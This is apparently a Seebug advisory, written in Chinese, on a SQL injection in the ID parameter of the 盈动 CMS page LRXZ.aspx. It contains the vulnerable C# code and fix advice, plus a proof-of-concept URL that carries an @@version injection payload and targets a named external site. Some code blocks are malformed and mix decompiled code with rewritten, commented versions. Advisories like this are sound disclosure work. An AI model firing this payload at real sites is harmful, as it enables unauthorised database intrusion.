盈动信息发布系统 /sites/main/LRXZ.aspx文件ID参数SQL注入漏洞

2016-05-24T00:00:00
ID SSV:91659
Type seebug
Reporter hhxx
Modified 2016-05-24T00:00:00

Description

0x01 漏洞框架

系统:盈动信息发布系统

盈动信息发布系统为杭州东方盈动计算机网络工程有限公司的一款 CMS 产品。

注入:

问题文件:/sites/main/LRXZ.aspx

问题参数:ID

0x02 漏洞详情

代码分析:

```csharp
protected void Page_Load(object sender, EventArgs e)

    {

    略...

            string text;

            if (this.Page.Request.QueryString["ID"] != null)

            {

                text = this.Page.Request.QueryString["ID"];/*获取参数*/

            }

            else

            {

                text = "465";

            }

            this.lblID.Text = text;

            string condition = "ClassID='" + this.lblID.Text + "' AND WebID=1 AND Deleted='0'";/*直接拼接SQL*/

            this.GetPageInfo(condition);/*注入A*/

            this.BindData(condition);/*注入B*/

        }

    }

```

this.GetPageInfo分析:

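```csharp
/// <summary>
/// Runs the Get_SiteData_ByPagination stored procedure in count mode (@DoCount = true)
/// and stores the returned count in PageInfo.RecordCount.
/// </summary>
/// <param name="condition">Raw SQL WHERE fragment passed verbatim as @StrWhere. The stored
/// procedure uses it as SQL text (this advisory's injection A), so it cannot be parameterised
/// here; it must only ever be built from validated input, i.e. the caller has to check the
/// request ID (an integer) before concatenating it.</param>
private void GetPageInfo(string condition)
{
    // using blocks dispose the connection and command even when Open()/ExecuteScalar()
    // throw; the original only closed the connection on the success path.
    using (SqlConnection sqlConnection = new SqlConnection(Globals.get_ConnectStr()))
    using (SqlCommand sqlCommand = new SqlCommand("Get_SiteData_ByPagination", sqlConnection))
    {
        sqlCommand.CommandType = CommandType.StoredProcedure;
        sqlCommand.Parameters.Add("@TblName", SqlDbType.NVarChar, 255).Value = "Articles";
        sqlCommand.Parameters.Add("@PageSize", SqlDbType.Int).Value = this.PageInfo.get_PageSize();
        sqlCommand.Parameters.Add("@PageIndex", SqlDbType.Int).Value = 1;
        sqlCommand.Parameters.Add("@DoCount", SqlDbType.Bit).Value = true;
        // Injection sink: the WHERE fragment is handed to the procedure as SQL, not as data.
        sqlCommand.Parameters.Add("@StrWhere", SqlDbType.NVarChar, 1500).Value = condition;
        sqlConnection.Open();
        // ExecuteScalar returns object; the cast throws if the procedure returns DBNull.
        this.PageInfo.set_RecordCount((int)sqlCommand.ExecuteScalar());
    }
}
```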

this.BindData分析:

``` private void BindData(string condition)

{

this.mydatalist.DataSource = this.CreateSource(condition);/*跟进此方法*/

略...

}

this.CreateSource:

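/// <summary>
/// Runs the Get_SiteData_ByPagination stored procedure in data mode (@DoCount = false)
/// for the current page and returns the resulting rows as a DataView.
/// </summary>
/// <param name="condition">Raw SQL WHERE fragment passed verbatim as @StrWhere. The stored
/// procedure uses it as SQL text (this advisory's injection B), so it cannot be parameterised
/// here; it must only ever be built from validated input, i.e. the caller has to check the
/// request ID (an integer) before concatenating it.</param>
/// <returns>The DefaultView of the filled "Guest" table. The DataSet is deliberately not
/// disposed because the returned view still references it.</returns>
private ICollection CreateSource(string condition)
{
    DataSet dataSet = new DataSet("GuestList");
    // using blocks dispose the connection, command and adapter even when Open()/Fill()
    // throw; the original only closed the connection on the success path.
    using (SqlConnection sqlConnection = new SqlConnection(Globals.get_ConnectStr()))
    using (SqlCommand sqlCommand = new SqlCommand("Get_SiteData_ByPagination", sqlConnection))
    {
        sqlCommand.CommandType = CommandType.StoredProcedure;
        sqlCommand.Parameters.Add("@TblName", SqlDbType.NVarChar, 255).Value = "Articles";
        sqlCommand.Parameters.Add("@PageSize", SqlDbType.Int).Value = this.PageInfo.get_PageSize();
        sqlCommand.Parameters.Add("@PageIndex", SqlDbType.Int).Value = this.PageInfo.get_CurrentPageIndex();
        sqlCommand.Parameters.Add("@DoCount", SqlDbType.Bit).Value = false;
        sqlCommand.Parameters.Add("@FldName", SqlDbType.NVarChar, 255).Value = "OnTop DESC, UpdateTime";
        sqlCommand.Parameters.Add("@KeyFld", SqlDbType.NVarChar, 255).Value = "NewsID";
        sqlCommand.Parameters.Add("@OrderType", SqlDbType.Bit).Value = true;
        // Injection sink: the WHERE fragment is handed to the procedure as SQL, not as data.
        sqlCommand.Parameters.Add("@StrWhere", SqlDbType.NVarChar, 1500).Value = condition;

        using (SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand))
        {
            sqlConnection.Open();
            sqlDataAdapter.Fill(dataSet, "Guest");
        }
    }

    return dataSet.Tables["Guest"].DefaultView;
}
```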

漏洞利用:

http://www.jhjdedu.org/sites/main/LRXZ.aspx?id=2'and 1=@@version and'1'='1

Pocsuite:

0x03 修复方式

1、对漏洞文件的 ID 参数进行过滤校验

2、使用加速乐等防护产品